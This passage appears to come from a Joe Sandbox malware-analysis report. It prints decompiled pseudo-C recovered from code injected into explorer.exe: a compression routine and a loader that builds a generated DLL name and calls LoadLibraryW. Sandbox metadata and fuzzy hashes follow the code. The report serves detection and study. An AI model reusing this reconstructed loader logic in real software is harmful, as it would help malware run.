                                                                                                                                                                                              					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                              					_v8 = _t245;
                                                                                                                                                                                              					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                              					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                              					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                              					if(_t227 >= _v16) {
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						if(_t253 != 4) {
                                                                                                                                                                                              							L10:
                                                                                                                                                                                              							_t269 = 0;
                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t285 = _t227 - _t195;
                                                                                                                                                                                              							if(_t227 != _t195) {
                                                                                                                                                                                              								goto L10;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t269 = _t253 - 3;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E02F97120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                              						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                              						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                              						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                              						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                              						E02F95E80(_t285,  *_t272);
                                                                                                                                                                                              						_t202 = _v8;
                                                                                                                                                                                              						_t273 = _t273 + 0x14;
                                                                                                                                                                                              						if(_t202 != 0) {
                                                                                                                                                                                              							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                              							_v8 = _t208;
                                                                                                                                                                                              							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t37 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t252 = _v8;
                                                                                                                                                                                              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                              							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                              							_t227 = _t227 - _t252;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t227 != 0) {
                                                                                                                                                                                              							E02F95FC0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t253 = _a8;
                                                                                                                                                                                              						if(_t269 == 0) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                              							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                              								goto L7;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					break;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t142 =  *_t272;
                                                                                                                                                                                              				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                              				_a4 = _t232;
                                                                                                                                                                                              				if(_t232 == 0) {
                                                                                                                                                                                              					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              					_t254 =  *_t83;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              					_t224 =  *_t59;
                                                                                                                                                                                              					if(_t232 < _t224) {
                                                                                                                                                                                              						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                              						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              						_t260 =  *_t66;
                                                                                                                                                                                              						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                                              						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                                              							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t261 = _t260 - _t224;
                                                                                                                                                                                              							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                                              							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                                              							_t70 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                                              							_t188 =  *_t70;
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t232 = _a4;
                                                                                                                                                                                              							__eflags = _t188 - 2;
                                                                                                                                                                                              							if(_t188 < 2) {
                                                                                                                                                                                              								_t189 = _t188 + 1;
                                                                                                                                                                                              								__eflags = _t189;
                                                                                                                                                                                              								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                                              						_t225 = _a4;
                                                                                                                                                                                              						_t273 = _t273 + 0xc;
                                                                                                                                                                                              						_t76 = _t272 + 0x6c;
                                                                                                                                                                                              						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                                              						__eflags =  *_t76;
                                                                                                                                                                                              						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              						_t184 =  *_t78;
                                                                                                                                                                                              						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t239 =  *_t79;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                                              						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                                              						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t184 =  *_t62;
                                                                                                                                                                                              						_t273 = _t273 + 0xc;
                                                                                                                                                                                              						_t225 = _a4;
                                                                                                                                                                                              						_t239 = _t184;
                                                                                                                                                                                              						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t254 = _t184;
                                                                                                                                                                                              					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                              					_t81 = _t272 + 0x16b4; // 0xed7505f9
                                                                                                                                                                                              					_t185 =  *_t81;
                                                                                                                                                                                              					_t240 = _t239 - _t185;
                                                                                                                                                                                              					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                              					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                              					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                              					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t269 == 0) {
                                                                                                                                                                                              					_t218 = _a8;
                                                                                                                                                                                              					__eflags = _t218;
                                                                                                                                                                                              					if(_t218 == 0) {
                                                                                                                                                                                              						L34:
                                                                                                                                                                                              						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                              						_t219 =  *_t272;
                                                                                                                                                                                              						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                              						_a4 =  *_t272;
                                                                                                                                                                                              						_t234 = _t254;
                                                                                                                                                                                              						_v16 = _t145;
                                                                                                                                                                                              						_v8 = _t254;
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                              						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                              							_v8 = _t254;
                                                                                                                                                                                              							_t95 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							_a4 = _t219;
                                                                                                                                                                                              							_t234 = _t254;
                                                                                                                                                                                              							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                              							if( *_t95 >=  *_t97) {
                                                                                                                                                                                              								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              								_t167 =  *_t98;
                                                                                                                                                                                              								_t259 = _t254 - _t167;
                                                                                                                                                                                              								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                              								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                              								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                              								_t103 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                                              								_t170 =  *_t103;
                                                                                                                                                                                              								_t273 = _t273 + 0xc;
                                                                                                                                                                                              								__eflags = _t170 - 2;
                                                                                                                                                                                              								if(_t170 < 2) {
                                                                                                                                                                                              									_t172 = _t170 + 1;
                                                                                                                                                                                              									__eflags = _t172;
                                                                                                                                                                                              									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              								_t145 = _v16 +  *_t106;
                                                                                                                                                                                              								__eflags = _t145;
                                                                                                                                                                                              								_a4 =  *_t272;
                                                                                                                                                                                              								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              								_t234 =  *_t108;
                                                                                                                                                                                              								_v8 = _t234;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t255 = _a4;
                                                                                                                                                                                              						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                              						__eflags = _t145 - _t220;
                                                                                                                                                                                              						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                              						_t146 = _t221;
                                                                                                                                                                                              						_a4 = _t221;
                                                                                                                                                                                              						_t222 = _a8;
                                                                                                                                                                                              						__eflags = _t146;
                                                                                                                                                                                              						if(_t146 != 0) {
                                                                                                                                                                                              							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							E02F95FC0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t117 = _t272 + 0x6c;
                                                                                                                                                                                              							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t117;
                                                                                                                                                                                              							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              							_t234 =  *_t119;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						__eflags =  *(_t272 + 0x16c0) - _t234;
                                                                                                                                                                                              						if( *(_t272 + 0x16c0) < _t234) {
                                                                                                                                                                                              							 *(_t272 + 0x16c0) = _t234;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t122 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              						_t123 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                              						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                                                                                                                                                                              						__eflags = _t257 - 0xffff;
                                                                                                                                                                                              						_t258 =  >  ? 0xffff : _t257;
                                                                                                                                                                                              						_t124 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t151 =  *_t124;
                                                                                                                                                                                              						_t125 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              						_t235 = _t234 -  *_t125;
                                                                                                                                                                                              						__eflags = _t258 - _t151;
                                                                                                                                                                                              						_t152 =  <=  ? _t258 : _t151;
                                                                                                                                                                                              						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                                                                                                                                                                              						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                                                                                                                                                                              							L49:
                                                                                                                                                                                              							__eflags = _t235 - _t258;
                                                                                                                                                                                              							_t154 =  >  ? _t258 : _t235;
                                                                                                                                                                                              							_a4 =  >  ? _t258 : _t235;
                                                                                                                                                                                              							__eflags = _t222 - 4;
                                                                                                                                                                                              							if(_t222 != 4) {
                                                                                                                                                                                              								L53:
                                                                                                                                                                                              								_t269 = 0;
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t161 =  *_t272;
                                                                                                                                                                                              								__eflags =  *(_t161 + 4);
                                                                                                                                                                                              								_t154 = _a4;
                                                                                                                                                                                              								if( *(_t161 + 4) != 0) {
                                                                                                                                                                                              									goto L53;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									__eflags = _t154 - _t235;
                                                                                                                                                                                              									if(_t154 != _t235) {
                                                                                                                                                                                              										goto L53;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t269 = _t222 - 3;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t131 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t132 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							E02F97120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                                                                                                                                                                              							_t134 = _t272 + 0x5c;
                                                                                                                                                                                              							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t134;
                                                                                                                                                                                              							E02F95E80( *_t134,  *_t272);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							__eflags = _t235;
                                                                                                                                                                                              							if(_t235 != 0) {
                                                                                                                                                                                              								L46:
                                                                                                                                                                                              								__eflags = _t222;
                                                                                                                                                                                              								if(_t222 != 0) {
                                                                                                                                                                                              									_t162 =  *_t272;
                                                                                                                                                                                              									__eflags =  *(_t162 + 4);
                                                                                                                                                                                              									if( *(_t162 + 4) == 0) {
                                                                                                                                                                                              										__eflags = _t235 - _t258;
                                                                                                                                                                                              										if(_t235 <= _t258) {
                                                                                                                                                                                              											goto L49;
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								__eflags = _t222 - 4;
                                                                                                                                                                                              								if(_t222 == 4) {
                                                                                                                                                                                              									goto L46;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						asm("sbb edi, edi");
                                                                                                                                                                                              						_t271 =  ~_t269 & 0x00000002;
                                                                                                                                                                                              						__eflags = _t271;
                                                                                                                                                                                              						return _t271;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__eflags = _t218 - 4;
                                                                                                                                                                                              						if(_t218 == 4) {
                                                                                                                                                                                              							goto L34;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t173 =  *_t272;
                                                                                                                                                                                              							__eflags =  *(_t173 + 4);
                                                                                                                                                                                              							if( *(_t173 + 4) != 0) {
                                                                                                                                                                                              								goto L34;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t88 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              								__eflags = _t254 -  *_t88;
                                                                                                                                                                                              								if(_t254 !=  *_t88) {
                                                                                                                                                                                              									goto L34;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									return 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return 3;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x02f94281
                                                                                                                                                                                              0x02f94284
                                                                                                                                                                                              0x02f94289
                                                                                                                                                                                              0x02f94289
                                                                                                                                                                                              0x02f9428c
                                                                                                                                                                                              0x02f9428f
                                                                                                                                                                                              0x02f94292
                                                                                                                                                                                              0x02f94294
                                                                                                                                                                                              0x02f94294
                                                                                                                                                                                              0x02f942f3
                                                                                                                                                                                              0x02f942f5
                                                                                                                                                                                              0x02f942f8
                                                                                                                                                                                              0x02f942f8
                                                                                                                                                                                              0x02f942fe
                                                                                                                                                                                              0x02f94302
                                                                                                                                                                                              0x02f94305
                                                                                                                                                                                              0x02f94307
                                                                                                                                                                                              0x02f94307
                                                                                                                                                                                              0x02f94318
                                                                                                                                                                                              0x02f9431a
                                                                                                                                                                                              0x02f9431a
                                                                                                                                                                                              0x02f94322
                                                                                                                                                                                              0x02f94330
                                                                                                                                                                                              0x02f94333
                                                                                                                                                                                              0x02f94335
                                                                                                                                                                                              0x02f94355
                                                                                                                                                                                              0x02f94355
                                                                                                                                                                                              0x02f94358
                                                                                                                                                                                              0x02f9435e
                                                                                                                                                                                              0x02f9435f
                                                                                                                                                                                              0x02f94362
                                                                                                                                                                                              0x02f94364
                                                                                                                                                                                              0x02f94367
                                                                                                                                                                                              0x02f9436a
                                                                                                                                                                                              0x02f9436d
                                                                                                                                                                                              0x02f94371
                                                                                                                                                                                              0x02f94374
                                                                                                                                                                                              0x02f94377
                                                                                                                                                                                              0x02f9437a
                                                                                                                                                                                              0x02f9437c
                                                                                                                                                                                              0x02f9437c
                                                                                                                                                                                              0x02f9437f
                                                                                                                                                                                              0x02f94381
                                                                                                                                                                                              0x02f94381
                                                                                                                                                                                              0x02f94384
                                                                                                                                                                                              0x02f94386
                                                                                                                                                                                              0x02f94389
                                                                                                                                                                                              0x02f94391
                                                                                                                                                                                              0x02f94394
                                                                                                                                                                                              0x02f94399
                                                                                                                                                                                              0x02f94399
                                                                                                                                                                                              0x02f9439f
                                                                                                                                                                                              0x02f943a2
                                                                                                                                                                                              0x02f943a5
                                                                                                                                                                                              0x02f943a7
                                                                                                                                                                                              0x02f943a7
                                                                                                                                                                                              0x02f943a8
                                                                                                                                                                                              0x02f943a8
                                                                                                                                                                                              0x02f943b3
                                                                                                                                                                                              0x02f943b3
                                                                                                                                                                                              0x02f943b3
                                                                                                                                                                                              0x02f943b6
                                                                                                                                                                                              0x02f943b9
                                                                                                                                                                                              0x02f943b9
                                                                                                                                                                                              0x02f943bc
                                                                                                                                                                                              0x02f943bc
                                                                                                                                                                                              0x02f9437f
                                                                                                                                                                                              0x02f943bf
                                                                                                                                                                                              0x02f943c2
                                                                                                                                                                                              0x02f943c5
                                                                                                                                                                                              0x02f943c7
                                                                                                                                                                                              0x02f943ca
                                                                                                                                                                                              0x02f943cc
                                                                                                                                                                                              0x02f943cf
                                                                                                                                                                                              0x02f943d2
                                                                                                                                                                                              0x02f943d4
                                                                                                                                                                                              0x02f943d7
                                                                                                                                                                                              0x02f943df
                                                                                                                                                                                              0x02f943e7
                                                                                                                                                                                              0x02f943ea
                                                                                                                                                                                              0x02f943ea
                                                                                                                                                                                              0x02f943ea
                                                                                                                                                                                              0x02f943ed
                                                                                                                                                                                              0x02f943ed
                                                                                                                                                                                              0x02f943ed
                                                                                                                                                                                              0x02f943f0
                                                                                                                                                                                              0x02f943f6
                                                                                                                                                                                              0x02f943f8
                                                                                                                                                                                              0x02f943f8
                                                                                                                                                                                              0x02f943fe
                                                                                                                                                                                              0x02f94404
                                                                                                                                                                                              0x02f9440d
                                                                                                                                                                                              0x02f94414
                                                                                                                                                                                              0x02f94416
                                                                                                                                                                                              0x02f94419
                                                                                                                                                                                              0x02f94419
                                                                                                                                                                                              0x02f9441c
                                                                                                                                                                                              0x02f9441c
                                                                                                                                                                                              0x02f9441f
                                                                                                                                                                                              0x02f94421
                                                                                                                                                                                              0x02f94424
                                                                                                                                                                                              0x02f94426
                                                                                                                                                                                              0x02f94441
                                                                                                                                                                                              0x02f94441
                                                                                                                                                                                              0x02f94445
                                                                                                                                                                                              0x02f94448
                                                                                                                                                                                              0x02f9444b
                                                                                                                                                                                              0x02f9444e
                                                                                                                                                                                              0x02f94464
                                                                                                                                                                                              0x02f94464
                                                                                                                                                                                              0x02f94464
                                                                                                                                                                                              0x02f94450
                                                                                                                                                                                              0x02f94450
                                                                                                                                                                                              0x02f94452
                                                                                                                                                                                              0x02f94456
                                                                                                                                                                                              0x02f94459
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9445b
                                                                                                                                                                                              0x02f9445b
                                                                                                                                                                                              0x02f9445d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f9445f
                                                                                                                                                                                              0x02f9445f
                                                                                                                                                                                              0x02f9445f
                                                                                                                                                                                              0x02f9445d
                                                                                                                                                                                              0x02f94459
                                                                                                                                                                                              0x02f94468
                                                                                                                                                                                              0x02f9446b
                                                                                                                                                                                              0x02f94470
                                                                                                                                                                                              0x02f9447a
                                                                                                                                                                                              0x02f9447a
                                                                                                                                                                                              0x02f9447a
                                                                                                                                                                                              0x02f9447d
                                                                                                                                                                                              0x02f94428
                                                                                                                                                                                              0x02f94428
                                                                                                                                                                                              0x02f9442a
                                                                                                                                                                                              0x02f94431
                                                                                                                                                                                              0x02f94431
                                                                                                                                                                                              0x02f94433
                                                                                                                                                                                              0x02f94435

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                              • Opcode ID: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction ID: 731336ac93f345b1d3558f8a687b4a73c4c5f369d82e875bd9d285cec12308a1
                                                                                                                                                                                              • Opcode Fuzzy Hash: d78685e2831b4aa8f0c5c5e600617b722de4f40544eb307eba323e3ebd37dfb5
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D12671A007009FEB28CF6DD9C0A6AB7E6FF98384B14892DE99AC7701D731E945CB54
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 89%
                                                                                                                                                                                              			E02F8D218(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v140;
                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                              				char _t15;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                              				intOrPtr _t32;
                                                                                                                                                                                              				WCHAR* _t34;
                                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                                              				struct HINSTANCE__* _t37;
                                                                                                                                                                                              				intOrPtr _t38;
                                                                                                                                                                                              				intOrPtr _t46;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				intOrPtr _t50;
                                                                                                                                                                                              				void* _t60;
                                                                                                                                                                                              				void* _t61;
                                                                                                                                                                                              				char _t62;
                                                                                                                                                                                              				void* _t65;
                                                                                                                                                                                              				intOrPtr _t66;
                                                                                                                                                                                              				char _t68;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __esi;
                                                                                                                                                                                              				_t61 = __edi;
                                                                                                                                                                                              				_t47 = __ebx;
                                                                                                                                                                                              				_t50 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              				_t14 =  *(_t50 + 0x1898);
                                                                                                                                                                                              				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
                                                                                                                                                                                              					_t15 = E02F89DF2(_t50, 0x392);
                                                                                                                                                                                              					_t66 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					_t62 = _t15;
                                                                                                                                                                                              					_t67 = _t66 + 0xb0;
                                                                                                                                                                                              					_v8 = _t62;
                                                                                                                                                                                              					E02F89E51( &_v140, 0x40, L"%08x", E02F8E2C5(_t66 + 0xb0, E02F8A43D(_t66 + 0xb0), 0));
                                                                                                                                                                                              					_t20 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                              					_t25 = E02F89DF2(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000a0b) + 0xf8);
                                                                                                                                                                                              					_t26 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					_t68 = E02F89A5A(_t26 + 0x1020);
                                                                                                                                                                                              					_v12 = _t68;
                                                                                                                                                                                              					E02F88BAF( &_v8);
                                                                                                                                                                                              					_t32 =  *0x2f9f81c; // 0x2fb0000
                                                                                                                                                                                              					_t34 = E02F89A5A(_t32 + 0x122a);
                                                                                                                                                                                              					 *0x2f9f91c = _t34;
                                                                                                                                                                                              					_t35 =  *0x2f9f818; // 0x508f6c8
                                                                                                                                                                                              					 *((intOrPtr*)(_t35 + 0x11c))(_t68, _t34, 0, 0x2f9c9a0,  &_v140, ".", L"dll", 0, 0x2f9c9a0, _t25, 0x2f9c9a0, _t62, 0, _t61, _t65, _t47);
                                                                                                                                                                                              					_t37 = LoadLibraryW( *0x2f9f91c);
                                                                                                                                                                                              					 *0x2f9f914 = _t37;
                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                              						_t38 = 0;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_push(_t37);
                                                                                                                                                                                              						_t60 = 0x28;
                                                                                                                                                                                              						_t38 = E02F8F011(0x2f9cb8c, _t60);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0x2f9f918 = _t38;
                                                                                                                                                                                              					E02F88BF4( &_v12, 0xfffffffe);
                                                                                                                                                                                              					E02F88D6D( &_v140, 0, 0x80);
                                                                                                                                                                                              					if( *0x2f9f918 != 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						E02F88BF4(0x2f9f91c, 0xfffffffe);
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					L8:
                                                                                                                                                                                              					if( *0x2f9f918 == 0) {
                                                                                                                                                                                              						_t46 =  *0x2f9f850; // 0x508f808
                                                                                                                                                                                              						 *0x2f9f918 = _t46;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L10:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

























                                                                                                                                                                                              0x02f8d363
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d365
                                                                                                                                                                                              0x02f8d36c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x02f8d372
                                                                                                                                                                                              0x02f8d373
                                                                                                                                                                                              0x02f8d373
                                                                                                                                                                                              0x02f8d37a
                                                                                                                                                                                              0x02f8d37c
                                                                                                                                                                                              0x02f8d381
                                                                                                                                                                                              0x02f8d381
                                                                                                                                                                                              0x02f8d386
                                                                                                                                                                                              0x02f8d38a
                                                                                                                                                                                              0x02f8d38a

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000020.00000002.676164607.0000000002F80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F80000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_32_2_2f80000_explorer.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                              • String ID: %08x$dll
                                                                                                                                                                                              • API String ID: 1029625771-2963171978
                                                                                                                                                                                              • Opcode ID: 2889e648d7493c0a28d6e908a501d642a556a4d2a0cf8e65e53c2e3833736f69
                                                                                                                                                                                              • Instruction ID: ae242531804975378a4c7af91c38999cfc03a458a7347434c8a9651bb07d6b20
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2889e648d7493c0a28d6e908a501d642a556a4d2a0cf8e65e53c2e3833736f69
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB3196B2F80108BFEB20BB68EC85FAAB3ADDB453D4F508635F205D3180DA7499558B64
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

